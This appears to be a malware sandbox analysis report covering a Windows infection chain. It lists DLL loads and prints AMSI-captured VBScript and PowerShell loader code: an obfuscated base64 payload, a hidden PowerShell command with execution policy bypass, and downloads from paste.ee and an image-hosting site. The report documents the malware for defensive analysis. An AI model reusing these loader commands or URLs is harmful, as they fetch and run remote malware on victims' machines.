Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/thAhY", "false");IServerXMLHTTPRequest2.send(); dim encavalgar , antecessor , remelgueiro , picardo , morsa , Cama , morsa1 antecessor = " " remelgueiro = "" & picardo & antecessor & picardo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & picardo & antecessor & picardo & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & picardo & antecessor & picardo & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & picardo & antecessor & picardo & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & picardo & antecessor & picardo & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & picardo & antecessor & picardo & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & picardo & antecessor & picardo & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & picardo & antecessor & picardo & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & picardo & antecessor & picardo & "gBsDgTreGUDgTre" & picardo & antecessor & picardo & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & picardo & antecessor & picardo & "gBvDgTreHIDgTre" & picardo & antecessor & picardo & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDg

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = 